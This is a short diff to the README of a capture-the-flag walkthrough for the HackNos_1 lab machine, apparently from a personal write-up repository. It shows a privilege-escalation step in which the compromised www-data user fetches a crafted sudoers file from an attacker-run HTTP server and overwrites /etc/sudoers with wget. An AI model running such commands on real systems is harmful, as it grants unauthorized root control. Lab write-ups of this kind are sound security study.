gustavocelani/ctf_walkthrough/018-HackNos_1/README.md

 Serving HTTP on 0.0.0.0 port 8787 ...
 ```

-In target machine we can use `/usr/bin/wget` to overwrite the original `sudoers` file:
+In target machine we can use `/usr/bin/wget` to overwrite the original `/etc/sudoers` file:
 ```
 www-data@hackNos:/$ wget http://192.168.1.189:8787/sudoers -O /etc/sudoers